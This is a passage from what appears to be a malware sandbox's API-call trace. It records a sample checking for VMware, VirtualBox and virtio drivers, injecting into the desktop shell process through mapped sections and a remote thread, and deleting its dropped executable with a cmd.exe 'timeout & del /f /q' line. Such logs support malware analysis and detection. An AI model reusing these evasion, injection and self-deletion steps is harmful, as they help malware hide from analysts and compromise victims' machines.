(_Str="dwm.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0185.786] wcsstr (_Str="dwm.exe", _SubStr="prl_tools.exe") returned 0x0 [0185.788] LocalFree (hMem=0x1db2050) returned 0x0 [0185.788] NtQuerySystemInformation (in: SystemInformationClass=0xb, SystemInformation=0x0, Length=0x0, ResultLength=0x19ff54 | out: SystemInformation=0x0, ResultLength=0x19ff54*=0x991c) returned 0xc0000004 [0185.789] LocalAlloc (uFlags=0x40, uBytes=0xa91c) returned 0x1db2050 [0185.789] NtQuerySystemInformation (in: SystemInformationClass=0xb, SystemInformation=0x1db2050, Length=0xa91c, ResultLength=0x19ff54 | out: SystemInformation=0x1db2050, ResultLength=0x19ff54*=0x991c) returned 0x0 [0185.789] strstr (_Str="ntoskrnl.exe", _SubStr="vmci.s") returned 0x0 [0185.789] strstr (_Str="ntoskrnl.exe", _SubStr="vmusbm") returned 0x0 [0185.789] strstr (_Str="ntoskrnl.exe", _SubStr="vmmous") returned 0x0 [0185.790] strstr (_Str="ntoskrnl.exe", _SubStr="vm3dmp") returned 0x0 [0185.790] strstr (_Str="ntoskrnl.exe", _SubStr="vmrawd") returned 0x0 [0185.790] strstr (_Str="ntoskrnl.exe", _SubStr="vmmemc") returned 0x0 [0185.790] strstr (_Str="ntoskrnl.exe", _SubStr="vboxgu") returned 0x0 [0185.790] strstr (_Str="ntoskrnl.exe", _SubStr="vboxsf") returned 0x0 [0185.790] strstr (_Str="ntoskrnl.exe", _SubStr="vboxmo") returned 0x0 [0185.790] strstr (_Str="ntoskrnl.exe", _SubStr="vboxvi") returned 0x0 [0185.790] strstr (_Str="ntoskrnl.exe", _SubStr="vboxdi") returned 0x0 [0185.790] strstr (_Str="ntoskrnl.exe", _SubStr="vioser") returned 0x0 [0185.790] strstr (_Str="hal.dll", _SubStr="vmci.s") returned 0x0 [0185.790] strstr (_Str="hal.dll", _SubStr="vmusbm") returned 0x0 [0185.790] strstr (_Str="hal.dll", _SubStr="vmmous") returned 0x0 [0185.790] strstr (_Str="hal.dll", _SubStr="vm3dmp") returned 0x0 [0185.790] strstr (_Str="hal.dll", _SubStr="vmrawd") returned 0x0 [0185.790] strstr (_Str="hal.dll", _SubStr="vmmemc") returned 0x0 [0185.790] strstr (_Str="hal.dll", _SubStr="vboxgu") returned 0x0 [0185.790] strstr (_Str="hal.dll", _SubStr="vboxsf") returned 0x0 [0185.790] strstr (_Str="hal.dll", _SubStr="vboxmo") returned 0x0 [0185.790] strstr (_Str="hal.dll", _SubStr="vboxvi") returned 0x0 [0185.790] strstr (_Str="hal.dll", _SubStr="vboxdi") returned 0x0 [0185.790] strstr (_Str="hal.dll", _SubStr="vioser") returned 0x0 [0185.791] strstr (_Str="kd.dll", _SubStr="vmci.s") returned 0x0 [0185.791] strstr (_Str="kd.dll", _SubStr="vmusbm") returned 0x0 [0185.791] strstr (_Str="kd.dll", _SubStr="vmmous") returned 0x0 [0185.791] strstr (_Str="kd.dll", _SubStr="vm3dmp") returned 0x0 [0185.791] strstr (_Str="kd.dll", _SubStr="vmrawd") returned 0x0 [0185.791] strstr (_Str="kd.dll", _SubStr="vmmemc") returned 0x0 [0185.791] strstr (_Str="kd.dll", _SubStr="vboxgu") returned 0x0 [0185.791] strstr (_Str="kd.dll", _SubStr="vboxsf") returned 0x0 [0185.791] strstr (_Str="kd.dll", _SubStr="vboxmo") returned 0x0 [0185.791] strstr (_Str="kd.dll", _SubStr="vboxvi") returned 0x0 [0185.791] strstr (_Str="kd.dll", _SubStr="vboxdi") returned 0x0 [0185.791] strstr (_Str="kd.dll", _SubStr="vioser") returned 0x0 [0190.496] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vmci.s") returned 0x0 [0190.496] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vmusbm") returned 0x0 [0190.496] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vmmous") returned 0x0 [0190.496] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vm3dmp") returned 0x0 [0190.496] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vmrawd") returned 0x0 [0190.496] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vmmemc") returned 0x0 [0190.496] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vboxgu") returned 0x0 [0190.496] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vboxsf") returned 0x0 [0190.496] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vboxmo") returned 0x0 [0190.496] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vboxvi") returned 0x0 [0190.496] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vboxdi") returned 0x0 [0190.496] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vioser") returned 0x0 [0190.497] strstr (_Str="werkernel.sys", _SubStr="vmci.s") returned 0x0 [0190.497] strstr (_Str="werkernel.sys", _SubStr="vmusbm") returned 0x0 [0190.497] strstr (_Str="werkernel.sys", _SubStr="vmmous") returned 0x0 [0190.497] strstr (_Str="werkernel.sys", _SubStr="vm3dmp") returned 0x0 [0190.497] strstr (_Str="werkernel.sys", _SubStr="vmrawd") returned 0x0 [0190.497] strstr (_Str="werkernel.sys", _SubStr="vmmemc") returned 0x0 [0190.497] strstr (_Str="werkernel.sys", _SubStr="vboxgu") returned 0x0 [0190.497] strstr (_Str="werkernel.sys", _SubStr="vboxsf") returned 0x0 [0190.497] strstr (_Str="werkernel.sys", _SubStr="vboxmo") returned 0x0 [0190.497] strstr (_Str="werkernel.sys", _SubStr="vboxvi") returned 0x0 [0190.497] strstr (_Str="werkernel.sys", _SubStr="vboxdi") returned 0x0 [0190.497] strstr (_Str="werkernel.sys", _SubStr="vioser") returned 0x0 [0190.497] strstr (_Str="clfs.sys", _SubStr="vmci.s") returned 0x0 [0190.497] strstr (_Str="clfs.sys", _SubStr="vmusbm") returned 0x0 [0190.497] strstr (_Str="clfs.sys", _SubStr="vmmous") returned 0x0 [0190.497] strstr (_Str="clfs.sys", _SubStr="vm3dmp") returned 0x0 [0190.497] strstr (_Str="clfs.sys", _SubStr="vmrawd") returned 0x0 [0190.497] strstr (_Str="clfs.sys", _SubStr="vmmemc") returned 0x0 [0190.497] strstr (_Str="clfs.sys", _SubStr="vboxgu") returned 0x0 [0190.497] strstr (_Str="clfs.sys", _SubStr="vboxsf") returned 0x0 [0190.497] strstr (_Str="clfs.sys", _SubStr="vboxmo") returned 0x0 [0190.497] strstr (_Str="clfs.sys", _SubStr="vboxvi") returned 0x0 [0190.497] strstr (_Str="clfs.sys", _SubStr="vboxdi") returned 0x0 [0190.497] strstr (_Str="clfs.sys", _SubStr="vioser") returned 0x0 [0190.498] strstr (_Str="tm.sys", _SubStr="vmci.s") returned 0x0 [0190.498] strstr (_Str="tm.sys", _SubStr="vmusbm") returned 0x0 [0190.498] strstr (_Str="tm.sys", _SubStr="vmmous") returned 0x0 [0190.498] strstr (_Str="tm.sys", _SubStr="vm3dmp") returned 0x0 [0190.498] strstr (_Str="tm.sys", _SubStr="vmrawd") returned 0x0 [0190.498] strstr (_Str="tm.sys", _SubStr="vmmemc") returned 0x0 [0190.498] strstr (_Str="tm.sys", _SubStr="vboxgu") returned 0x0 [0190.498] strstr (_Str="tm.sys", _SubStr="vboxsf") returned 0x0 [0190.498] strstr (_Str="tm.sys", _SubStr="vboxmo") returned 0x0 [0190.498] strstr (_Str="tm.sys", _SubStr="vboxvi") returned 0x0 [0190.498] strstr (_Str="tm.sys", _SubStr="vboxdi") returned 0x0 [0190.498] strstr (_Str="tm.sys", _SubStr="vioser") returned 0x0 [0190.498] strstr (_Str="pshed.dll", _SubStr="vmci.s") returned 0x0 [0190.498] strstr (_Str="pshed.dll", _SubStr="vmusbm") returned 0x0 [0190.498] strstr (_Str="pshed.dll", _SubStr="vmmous") returned 0x0 [0190.498] strstr (_Str="pshed.dll", _SubStr="vm3dmp") returned 0x0 [0190.498] strstr (_Str="pshed.dll", _SubStr="vmrawd") returned 0x0 [0190.498] strstr (_Str="pshed.dll", _SubStr="vmmemc") returned 0x0 [0190.498] strstr (_Str="pshed.dll", _SubStr="vboxgu") returned 0x0 [0190.498] strstr (_Str="pshed.dll", _SubStr="vboxsf") returned 0x0 [0190.498] strstr (_Str="pshed.dll", _SubStr="vboxmo") returned 0x0 [0190.498] strstr (_Str="pshed.dll", _SubStr="vboxvi") returned 0x0 [0190.498] strstr (_Str="pshed.dll", _SubStr="vboxdi") returned 0x0 [0190.498] strstr (_Str="pshed.dll", _SubStr="vioser") returned 0x0 [0190.499] strstr (_Str="bootvid.dll", _SubStr="vmci.s") returned 0x0 [0190.499] strstr (_Str="bootvid.dll", _SubStr="vmusbm") returned 0x0 [0190.499] strstr (_Str="bootvid.dll", _SubStr="vmmous") returned 0x0 [0190.499] strstr (_Str="bootvid.dll", _SubStr="vm3dmp") returned 0x0 [0190.499] strstr (_Str="bootvid.dll", _SubStr="vmrawd") returned 0x0 [0190.499] strstr (_Str="bootvid.dll", _SubStr="vmmemc") returned 0x0 [0190.499] strstr (_Str="bootvid.dll", _SubStr="vboxgu") returned 0x0 [0190.499] strstr (_Str="bootvid.dll", _SubStr="vboxsf") returned 0x0 [0190.499] strstr (_Str="bootvid.dll", _SubStr="vboxmo") returned 0x0 [0190.499] strstr (_Str="bootvid.dll", _SubStr="vboxvi") returned 0x0 [0190.499] strstr (_Str="bootvid.dll", _SubStr="vboxdi") returned 0x0 [0190.499] strstr (_Str="bootvid.dll", _SubStr="vioser") returned 0x0 [0190.499] strstr (_Str="cmimcext.sys", _SubStr="vmci.s") returned 0x0 [0190.499] strstr (_Str="cmimcext.sys", _SubStr="vmusbm") returned 0x0 [0190.499] strstr (_Str="cmimcext.sys", _SubStr="vmmous") returned 0x0 [0190.499] strstr (_Str="cmimcext.sys", _SubStr="vm3dmp") returned 0x0 [0190.499] strstr (_Str="cmimcext.sys", _SubStr="vmrawd") returned 0x0 [0190.499] strstr (_Str="cmimcext.sys", _SubStr="vmmemc") returned 0x0 [0190.499] strstr (_Str="cmimcext.sys", _SubStr="vboxgu") returned 0x0 [0190.499] strstr (_Str="cmimcext.sys", _SubStr="vboxsf") returned 0x0 [0190.500] strstr (_Str="cmimcext.sys", _SubStr="vboxmo") returned 0x0 [0190.500] strstr (_Str="cmimcext.sys", _SubStr="vboxvi") returned 0x0 [0190.500] strstr (_Str="cmimcext.sys", _SubStr="vboxdi") returned 0x0 [0190.500] strstr (_Str="cmimcext.sys", _SubStr="vioser") returned 0x0 [0190.500] strstr (_Str="ntosext.sys", _SubStr="vmci.s") returned 0x0 [0190.500] strstr (_Str="ntosext.sys", _SubStr="vmusbm") returned 0x0 [0190.500] strstr (_Str="ntosext.sys", _SubStr="vmmous") returned 0x0 [0190.500] strstr (_Str="ntosext.sys", _SubStr="vm3dmp") returned 0x0 [0190.500] strstr (_Str="ntosext.sys", _SubStr="vmrawd") returned 0x0 [0190.500] strstr (_Str="ntosext.sys", _SubStr="vmmemc") returned 0x0 [0190.500] strstr (_Str="ntosext.sys", _SubStr="vboxgu") returned 0x0 [0190.500] strstr (_Str="ntosext.sys", _SubStr="vboxsf") returned 0x0 [0190.500] strstr (_Str="ntosext.sys", _SubStr="vboxmo") returned 0x0 [0190.500] strstr (_Str="ntosext.sys", _SubStr="vboxvi") returned 0x0 [0190.500] strstr (_Str="ntosext.sys", _SubStr="vboxdi") returned 0x0 [0190.500] strstr (_Str="ntosext.sys", _SubStr="vioser") returned 0x0 [0190.500] strstr (_Str="ci.dll", _SubStr="vmci.s") returned 0x0 [0190.500] strstr (_Str="ci.dll", _SubStr="vmusbm") returned 0x0 [0190.500] strstr (_Str="ci.dll", _SubStr="vmmous") returned 0x0 [0190.500] strstr (_Str="ci.dll", _SubStr="vm3dmp") returned 0x0 [0190.500] strstr (_Str="ci.dll", _SubStr="vmrawd") returned 0x0 [0190.500] strstr (_Str="ci.dll", _SubStr="vmmemc") returned 0x0 [0190.500] strstr (_Str="ci.dll", _SubStr="vboxgu") returned 0x0 [0190.500] strstr (_Str="ci.dll", _SubStr="vboxsf") returned 0x0 [0190.501] strstr (_Str="ci.dll", _SubStr="vboxmo") returned 0x0 [0190.501] strstr (_Str="ci.dll", _SubStr="vboxvi") returned 0x0 [0190.501] strstr (_Str="ci.dll", _SubStr="vboxdi") returned 0x0 [0190.501] strstr (_Str="ci.dll", _SubStr="vioser") returned 0x0 [0190.501] strstr (_Str="msrpc.sys", _SubStr="vmci.s") returned 0x0 [0190.501] strstr (_Str="msrpc.sys", _SubStr="vmusbm") returned 0x0 [0190.501] strstr (_Str="msrpc.sys", _SubStr="vmmous") returned 0x0 [0190.501] strstr (_Str="msrpc.sys", _SubStr="vm3dmp") returned 0x0 [0190.501] strstr (_Str="msrpc.sys", _SubStr="vmrawd") returned 0x0 [0190.501] strstr (_Str="msrpc.sys", _SubStr="vmmemc") returned 0x0 [0190.501] strstr (_Str="msrpc.sys", _SubStr="vboxgu") returned 0x0 [0190.501] strstr (_Str="msrpc.sys", _SubStr="vboxsf") returned 0x0 [0190.501] strstr (_Str="msrpc.sys", _SubStr="vboxmo") returned 0x0 [0190.501] strstr (_Str="msrpc.sys", _SubStr="vboxvi") returned 0x0 [0190.501] strstr (_Str="msrpc.sys", _SubStr="vboxdi") returned 0x0 [0190.501] strstr (_Str="msrpc.sys", _SubStr="vioser") returned 0x0 [0190.501] strstr (_Str="fltmgr.sys", _SubStr="vmci.s") returned 0x0 [0190.501] strstr (_Str="fltmgr.sys", _SubStr="vmusbm") returned 0x0 [0190.501] strstr (_Str="fltmgr.sys", _SubStr="vmmous") returned 0x0 [0190.501] strstr (_Str="fltmgr.sys", _SubStr="vm3dmp") returned 0x0 [0190.501] strstr (_Str="fltmgr.sys", _SubStr="vmrawd") returned 0x0 [0190.502] strstr (_Str="fltmgr.sys", _SubStr="vmmemc") returned 0x0 [0190.502] strstr (_Str="fltmgr.sys", _SubStr="vboxgu") returned 0x0 [0190.502] strstr (_Str="fltmgr.sys", _SubStr="vboxsf") returned 0x0 [0190.502] strstr (_Str="fltmgr.sys", _SubStr="vboxmo") returned 0x0 [0190.502] strstr (_Str="fltmgr.sys", _SubStr="vboxvi") returned 0x0 [0190.502] strstr (_Str="fltmgr.sys", _SubStr="vboxdi") returned 0x0 [0190.502] strstr (_Str="fltmgr.sys", _SubStr="vioser") returned 0x0 [0190.502] strstr (_Str="ksecdd.sys", _SubStr="vmci.s") returned 0x0 [0190.502] strstr (_Str="ksecdd.sys", _SubStr="vmusbm") returned 0x0 [0190.502] strstr (_Str="ksecdd.sys", _SubStr="vmmous") returned 0x0 [0190.502] strstr (_Str="ksecdd.sys", _SubStr="vm3dmp") returned 0x0 [0190.502] strstr (_Str="ksecdd.sys", _SubStr="vmrawd") returned 0x0 [0190.502] strstr (_Str="ksecdd.sys", _SubStr="vmmemc") returned 0x0 [0190.502] strstr (_Str="ksecdd.sys", _SubStr="vboxgu") returned 0x0 [0190.502] strstr (_Str="ksecdd.sys", _SubStr="vboxsf") returned 0x0 [0190.502] strstr (_Str="ksecdd.sys", _SubStr="vboxmo") returned 0x0 [0190.502] strstr (_Str="ksecdd.sys", _SubStr="vboxvi") returned 0x0 [0190.502] strstr (_Str="ksecdd.sys", _SubStr="vboxdi") returned 0x0 [0190.502] strstr (_Str="ksecdd.sys", _SubStr="vioser") returned 0x0 [0190.502] strstr (_Str="clipsp.sys", _SubStr="vmci.s") returned 0x0 [0190.502] strstr (_Str="clipsp.sys", _SubStr="vmusbm") returned 0x0 [0190.503] strstr (_Str="clipsp.sys", _SubStr="vmmous") returned 0x0 [0190.503] strstr (_Str="clipsp.sys", _SubStr="vm3dmp") returned 0x0 [0190.503] strstr (_Str="clipsp.sys", _SubStr="vmrawd") returned 0x0 [0190.503] strstr (_Str="clipsp.sys", _SubStr="vmmemc") returned 0x0 [0190.503] strstr (_Str="clipsp.sys", _SubStr="vboxgu") returned 0x0 [0190.503] strstr (_Str="clipsp.sys", _SubStr="vboxsf") returned 0x0 [0190.503] strstr (_Str="clipsp.sys", _SubStr="vboxmo") returned 0x0 [0190.503] strstr (_Str="clipsp.sys", _SubStr="vboxvi") returned 0x0 [0190.503] strstr (_Str="clipsp.sys", _SubStr="vboxdi") returned 0x0 [0190.503] strstr (_Str="clipsp.sys", _SubStr="vioser") returned 0x0 [0190.503] strstr (_Str="wdf01000.sys", _SubStr="vmci.s") returned 0x0 [0190.503] strstr (_Str="wdf01000.sys", _SubStr="vmusbm") returned 0x0 [0190.503] strstr (_Str="wdf01000.sys", _SubStr="vmmous") returned 0x0 [0190.503] strstr (_Str="wdf01000.sys", _SubStr="vm3dmp") returned 0x0 [0190.503] strstr (_Str="wdf01000.sys", _SubStr="vmrawd") returned 0x0 [0190.503] strstr (_Str="wdf01000.sys", _SubStr="vmmemc") returned 0x0 [0190.503] strstr (_Str="wdf01000.sys", _SubStr="vboxgu") returned 0x0 [0190.503] strstr (_Str="wdf01000.sys", _SubStr="vboxsf") returned 0x0 [0190.503] strstr (_Str="wdf01000.sys", _SubStr="vboxmo") returned 0x0 [0190.503] strstr (_Str="wdf01000.sys", _SubStr="vboxvi") returned 0x0 [0190.503] strstr (_Str="wdf01000.sys", _SubStr="vboxdi") returned 0x0 [0190.503] strstr (_Str="wdf01000.sys", _SubStr="vioser") returned 0x0 [0190.504] strstr (_Str="wdfldr.sys", _SubStr="vmci.s") returned 0x0 [0190.504] strstr (_Str="wdfldr.sys", _SubStr="vmusbm") returned 0x0 [0190.504] strstr (_Str="wdfldr.sys", _SubStr="vmmous") returned 0x0 [0190.504] strstr (_Str="wdfldr.sys", _SubStr="vm3dmp") returned 0x0 [0190.504] strstr (_Str="wdfldr.sys", _SubStr="vmrawd") returned 0x0 [0190.504] strstr (_Str="wdfldr.sys", _SubStr="vmmemc") returned 0x0 [0190.504] strstr (_Str="wdfldr.sys", _SubStr="vboxgu") returned 0x0 [0190.504] strstr (_Str="wdfldr.sys", _SubStr="vboxsf") returned 0x0 [0190.504] strstr (_Str="wdfldr.sys", _SubStr="vboxmo") returned 0x0 [0190.504] strstr (_Str="wdfldr.sys", _SubStr="vboxvi") returned 0x0 [0190.504] strstr (_Str="wdfldr.sys", _SubStr="vboxdi") returned 0x0 [0190.504] strstr (_Str="wdfldr.sys", _SubStr="vioser") returned 0x0 [0190.504] strstr (_Str="acpiex.sys", _SubStr="vmci.s") returned 0x0 [0190.504] strstr (_Str="acpiex.sys", _SubStr="vmusbm") returned 0x0 [0190.504] strstr (_Str="acpiex.sys", _SubStr="vmmous") returned 0x0 [0190.504] strstr (_Str="acpiex.sys", _SubStr="vm3dmp") returned 0x0 [0190.504] strstr (_Str="acpiex.sys", _SubStr="vmrawd") returned 0x0 [0190.504] strstr (_Str="acpiex.sys", _SubStr="vmmemc") returned 0x0 [0190.504] strstr (_Str="acpiex.sys", _SubStr="vboxgu") returned 0x0 [0190.505] strstr (_Str="acpiex.sys", _SubStr="vboxsf") returned 0x0 [0190.505] strstr (_Str="acpiex.sys", _SubStr="vboxmo") returned 0x0 [0190.505] strstr (_Str="acpiex.sys", _SubStr="vboxvi") returned 0x0 [0190.505] strstr (_Str="acpiex.sys", _SubStr="vboxdi") returned 0x0 [0190.505] strstr (_Str="acpiex.sys", _SubStr="vioser") returned 0x0 [0190.505] strstr (_Str="wpprecorder.sys", _SubStr="vmci.s") returned 0x0 [0190.505] strstr (_Str="wpprecorder.sys", _SubStr="vmusbm") returned 0x0 [0190.505] strstr (_Str="wpprecorder.sys", _SubStr="vmmous") returned 0x0 [0190.505] strstr (_Str="wpprecorder.sys", _SubStr="vm3dmp") returned 0x0 [0190.505] strstr (_Str="wpprecorder.sys", _SubStr="vmrawd") returned 0x0 [0190.505] strstr (_Str="wpprecorder.sys", _SubStr="vmmemc") returned 0x0 [0190.505] strstr (_Str="wpprecorder.sys", _SubStr="vboxgu") returned 0x0 [0190.505] strstr (_Str="wpprecorder.sys", _SubStr="vboxsf") returned 0x0 [0190.505] strstr (_Str="wpprecorder.sys", _SubStr="vboxmo") returned 0x0 [0190.505] strstr (_Str="wpprecorder.sys", _SubStr="vboxvi") returned 0x0 [0190.505] strstr (_Str="wpprecorder.sys", _SubStr="vboxdi") returned 0x0 [0190.505] strstr (_Str="wpprecorder.sys", _SubStr="vioser") returned 0x0 [0190.505] strstr (_Str="cng.sys", _SubStr="vmci.s") returned 0x0 [0190.506] strstr (_Str="cng.sys", _SubStr="vmusbm") returned 0x0 [0190.506] strstr (_Str="cng.sys", _SubStr="vmmous") returned 0x0 [0190.506] strstr (_Str="cng.sys", _SubStr="vm3dmp") returned 0x0 [0190.506] strstr (_Str="cng.sys", _SubStr="vmrawd") returned 0x0 [0190.506] strstr (_Str="cng.sys", _SubStr="vmmemc") returned 0x0 [0190.506] strstr (_Str="cng.sys", _SubStr="vboxgu") returned 0x0 [0190.506] strstr (_Str="cng.sys", _SubStr="vboxsf") returned 0x0 [0190.506] strstr (_Str="cng.sys", _SubStr="vboxmo") returned 0x0 [0190.506] strstr (_Str="cng.sys", _SubStr="vboxvi") returned 0x0 [0190.506] strstr (_Str="cng.sys", _SubStr="vboxdi") returned 0x0 [0190.506] strstr (_Str="cng.sys", _SubStr="vioser") returned 0x0 [0190.506] strstr (_Str="acpi.sys", _SubStr="vmci.s") returned 0x0 [0190.506] strstr (_Str="acpi.sys", _SubStr="vmusbm") returned 0x0 [0190.506] strstr (_Str="acpi.sys", _SubStr="vmmous") returned 0x0 [0190.506] strstr (_Str="acpi.sys", _SubStr="vm3dmp") returned 0x0 [0190.506] strstr (_Str="acpi.sys", _SubStr="vmrawd") returned 0x0 [0190.506] strstr (_Str="acpi.sys", _SubStr="vmmemc") returned 0x0 [0190.506] strstr (_Str="acpi.sys", _SubStr="vboxgu") returned 0x0 [0190.506] strstr (_Str="acpi.sys", _SubStr="vboxsf") returned 0x0 [0190.506] strstr (_Str="acpi.sys", _SubStr="vboxmo") returned 0x0 [0190.506] strstr (_Str="acpi.sys", _SubStr="vboxvi") returned 0x0 [0190.506] strstr (_Str="acpi.sys", _SubStr="vboxdi") returned 0x0 [0190.506] strstr (_Str="acpi.sys", _SubStr="vioser") returned 0x0 [0190.507] strstr (_Str="wmilib.sys", _SubStr="vmci.s") returned 0x0 [0190.507] strstr (_Str="wmilib.sys", _SubStr="vmusbm") returned 0x0 [0190.507] strstr (_Str="wmilib.sys", _SubStr="vmmous") returned 0x0 [0190.507] strstr (_Str="wmilib.sys", _SubStr="vm3dmp") returned 0x0 [0190.507] strstr (_Str="wmilib.sys", _SubStr="vmrawd") returned 0x0 [0190.507] strstr (_Str="wmilib.sys", _SubStr="vmmemc") returned 0x0 [0190.507] strstr (_Str="wmilib.sys", _SubStr="vboxgu") returned 0x0 [0190.507] strstr (_Str="wmilib.sys", _SubStr="vboxsf") returned 0x0 [0190.507] strstr (_Str="wmilib.sys", _SubStr="vboxmo") returned 0x0 [0190.507] strstr (_Str="wmilib.sys", _SubStr="vboxvi") returned 0x0 [0190.507] strstr (_Str="wmilib.sys", _SubStr="vboxdi") returned 0x0 [0190.507] strstr (_Str="wmilib.sys", _SubStr="vioser") returned 0x0 [0190.508] LocalFree (hMem=0x1db2050) returned 0x0 [0190.509] Sleep (dwMilliseconds=0x1388) [0195.520] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ff1c*=0x0, ZeroBits=0x0, RegionSize=0x19ff24*=0x5200, AllocationType=0x3000, Protect=0x4 | out: BaseAddress=0x19ff1c*=0x420000, RegionSize=0x19ff24*=0x6000) returned 0x0 [0195.522] GetShellWindow () returned 0x100de [0195.522] GetWindowThreadProcessId (in: hWnd=0x100de, lpdwProcessId=0x19fec8 | out: lpdwProcessId=0x19fec8) returned 0x7b8 [0195.523] NtOpenProcess (in: ProcessHandle=0x19ff18, DesiredAccess=0x40, ObjectAttributes=0x19ff00*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0x19fef8*(UniqueProcess=0x7b4, UniqueThread=0x0) | out: ProcessHandle=0x19ff18*=0x15c) returned 0x0 [0195.523] NtDuplicateObject (in: SourceProcessHandle=0x15c, SourceHandle=0xffffffff, TargetProcessHandle=0xffffffff, TargetHandle=0x19ff1c, DesiredAccess=0x0, HandleAttributes=0x0, Options=0x2 | out: TargetHandle=0x19ff1c*=0x160) returned 0x0 [0195.523] NtCreateSection (in: SectionHandle=0x19fed4, DesiredAccess=0x6, ObjectAttributes=0x0, MaximumSize=0x19fed8, SectionPageProtection=0x4, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x19fed4*=0x164) returned 0x0 [0195.523] NtMapViewOfSection (in: SectionHandle=0x164, ProcessHandle=0xffffffff, BaseAddress=0x19fee4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19fef0*=0x5000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0x19fee4*=0x430000, SectionOffset=0x0, ViewSize=0x19fef0*=0x5000) returned 0x0 [0195.524] NtMapViewOfSection (in: SectionHandle=0x164, ProcessHandle=0x160, BaseAddress=0x19feec*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19fef0*=0x5000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0x19feec*=0x1e50000, SectionOffset=0x0, ViewSize=0x19fef0*=0x5000) returned 0x0 [0195.525] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x430000, nSize=0x104 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\bcatcih")) returned 0x2d [0195.525] NtCreateSection (in: SectionHandle=0x19fed0, DesiredAccess=0xe, ObjectAttributes=0x0, MaximumSize=0x19fed8, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x19fed0*=0x168) returned 0x0 [0195.525] NtMapViewOfSection (in: SectionHandle=0x168, ProcessHandle=0xffffffff, BaseAddress=0x19fee0*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19fef0*=0x15200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0x19fee0*=0x460000, SectionOffset=0x0, ViewSize=0x19fef0*=0x16000) returned 0x0 [0195.525] NtMapViewOfSection (in: SectionHandle=0x168, ProcessHandle=0x160, BaseAddress=0x19fee8*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19fef0*=0x16000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x20 | out: BaseAddress=0x19fee8*=0x1e60000, SectionOffset=0x0, ViewSize=0x19fef0*=0x16000) returned 0x0 [0195.529] RtlCreateUserThread (in: ProcessHandle=0x160, SecurityDescriptor=0x0, CreateSuspended=0, StackZeroBits=0x0, StackReserve=0x0, StackCommit=0x0, StartAddress=0x1e61930, Parameter=0x1e50000, ThreadHandle=0x19fe30*=0x5a01db2048, ClientId=0x0 | out: ThreadHandle=0x19fe30*=0x16c, ClientId=0x0) returned 0x0 [0195.530] NtTerminateProcess (ProcessHandle=0xffffffff, ExitStatus=0x0) Thread: id = 164 os_tid = 0xd98 Process: id = "10" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x6dc71000" os_pid = "0xd30" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "8" os_parent_pid = "0x14c" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /c timeout /t 5 & del /f /q \"C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\" & exit" cur_dir = "C:\\ProgramData\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fa87" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3110 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3111 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3112 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3113 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 3114 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 3115 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 3116 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3117 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id 